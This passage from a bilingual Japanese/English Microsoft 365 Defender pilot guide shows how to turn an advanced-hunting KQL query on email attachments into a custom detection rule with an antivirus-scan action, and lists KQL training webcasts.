    | project-rename EmailTimestamp=Timestamp
    | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
    | join DeviceFileEvents on SHA256
    | where ActionType == "FileCreated"
    | distinct SHA1
    | invoke FileProfile()
    

検出を作成するCreate a detection

将来発生した場合に通知を受け取る情報を識別するクエリを作成したら、クエリからカスタム検出を作成できます。Once you have created a query that identifies information that you'd like to get alerted about if they happen in the future, you can create a custom detection from the query.

カスタム検出では、設定した頻度に従ってクエリが実行され、クエリの結果によって、選択した影響を受け取ったアセットに基づいてセキュリティアラートが作成されます。Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. これらのアラートはインシデントに関連付け、製品の 1 つによって生成される他のセキュリティ アラートとしてトリアージできます。Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.

  1. クエリ ページで、Go ハンティング手順の手順 7 で追加された行 7 と 8 を削除し、[検出ルールの作成] をクリックしますOn the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click Create detection rule.

    高度な検索ページで [検出ルールの作成] をクリックできる場所のスクリーンショット

    注意

    [検出ルール の作成] を クリックし、クエリに構文エラーがある場合、検出ルールは保存されません。If you click Create detection rule and you have syntax errors in your query, your detection rule won't be saved. クエリをダブルクリックして、エラーがないか確認します。Double-check your query to ensure there's no errors.

  2. 必要なフィールドに、セキュリティ チームがアラートを理解できる情報、アラートが生成された理由、および必要なアクションを入力します。Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.

    アラートの詳細を定義できる検出ルールの作成ページのスクリーンショット

    この検出ルールアラートに関する情報に基づいた決定を次のユーザーに提供するために、フィールドに明確な情報を入力してください。Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert

  3. このアラートで影響を受け取るエンティティを選択します。Select what entities are impacted in this alert. この場合、[デバイスとメールボックス ] を****選択しますIn this case, select Device and Mailbox.

    影響を受け取ったエンティティのパラメーターを選択できる検出ルールの作成ページのスクリーンショット

  4. アラートがトリガーされた場合に実行するアクションを決定します。Determine what actions should take place if the alert is triggered. この場合、ウイルス対策スキャンを実行しますが、他の操作を実行できます。In this case, run an antivirus scan, though other actions could be taken.

    脅威への対処に役立つアラートがトリガーされた場合にウイルス対策スキャンを実行できる検出ルールの作成ページのスクリーンショット

  5. アラート ルールのスコープを選択します。Select the scope for the alert rule. このクエリにはデバイスが含まれるので、デバイス グループは Microsoft Defender for Endpoint コンテキストに従って、このカスタム検出に関連します。Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. 影響を受け取ったエンティティとしてデバイスを含めないカスタム検出を作成する場合、スコープは適用されません。When creating a custom detection that does not include devices as impacted entities, scope does not apply.

    アラート ルールのスコープを設定できる検出ルールの作成ページのスクリーンショットで、表示される結果に対する期待値を管理します。

    このパイロットの場合は、このルールを実稼働環境のテスト デバイスのサブセットに制限できます。For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.

  6. [作成] を選択します。Select Create. 次に、ナビゲーション パネルから [カスタム 検出ルール] を選択します。Then, select Custom detection rules from the navigation panel.

    メニューの [カスタム検出ルール] オプションのスクリーンショット

    ルールと実行の詳細を表示する検出ルール ページのスクリーンショット

    このページから検出ルールを選択すると、詳細ページが開きます。From this page, you can select the detection rule, which will open a details page.

    ルールの実行の状態、トリガーされたアラートとアクション、検出の編集などがある電子メールの添付ファイル ページのスクリーンショット

その他の高度な狩猟ウォークスルー演習Additional advanced hunting walk-through exercises

高度な検索の詳細については、次の Web キャストで、Microsoft 365 Defender 内の高度な狩猟の機能について説明し、クロスピラー クエリを作成し、エンティティにピボットし、カスタム検出と修復アクションを作成します。To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities and create custom detections and remediation actions.

注意

パイロット テスト ラボ環境でGitHubクエリを実行するには、独自のアカウントを使用して準備してください。Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.

タイトルTitle 説明Description MP4 をダウンロードするDownload MP4 YouTube で視聴するWatch on YouTube 使用する CSL ファイルCSL file to use
エピソード 1: KQL の基本Episode 1: KQL fundamentals Defender の高度な狩猟機能の基本Microsoft 365します。We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. 使用可能な高度な検索データと基本的な KQL 構文と演算子について説明します。Learn about available advanced hunting data and basic KQL syntax and operators. MP4MP4 YouTubeYouTube エピソード 1: Git の CSL ファイルEpisode 1: CSL file in Git
エピソード 2: 参加Episode 2: Joins 高度な検索のデータと、テーブルを一緒に結合する方法について引き続き学習します。We'll continue learning about data in advanced hunting and how to join tables together. 内部、外側、一意、および半結合、および既定の Kusto innerunique 結合のニュアンスについて説明します。Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join. MP4MP4 YouTubeYouTube エピソード 2: Git の CSL ファイルEpisode 2: CSL file in Git
エピソード 3: データの要約、ピボット、および視覚化Episode 3: Summarizing, pivoting, and visualizing data データのフィルター処理、操作、結合ができたので、データの要約、定量化、ピボット、視覚化を開始します。Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. このエピソードでは、要約演算子と、高度な狩猟スキーマの追加テーブルに飛び込む間に実行できる計算の一部について説明します。In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. 分析の改善に役立つグラフにデータセットを変換します。We turn our datasets into charts that can help improve analysis. MP4MP4 YouTubeYouTube エピソード 3: Git の CSL ファイルEpisode 3: CSL file in Git
エピソード 4: ハントしましょう!Episode 4: Let's hunt! インシデント追跡への KQL の適用Applying KQL to incident tracking 攻撃者のアクティビティを追跡する時間!Time to track some attacker activity! このエピソードでは、攻撃を追跡するために、KQL と高度なMicrosoft 365を使用します。In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. サイバーセキュリティの ABC やインシデント対応に適用する方法など、攻撃者のアクティビティを追跡するためにフィールドで使用されるヒントとコツについて説明します。Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response. MP4MP4 YouTubeYouTube エピソード 4: Git の CSL ファイルEpisode 4: CSL file in Git

次の手順Next step

閉じると概要のフェーズClosing and summary phase
閉じると概要のフェーズClosing and summary phase
Defender パイロットMicrosoft 365結果を分析し、関係者に提示し、次の手順を実行します。Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.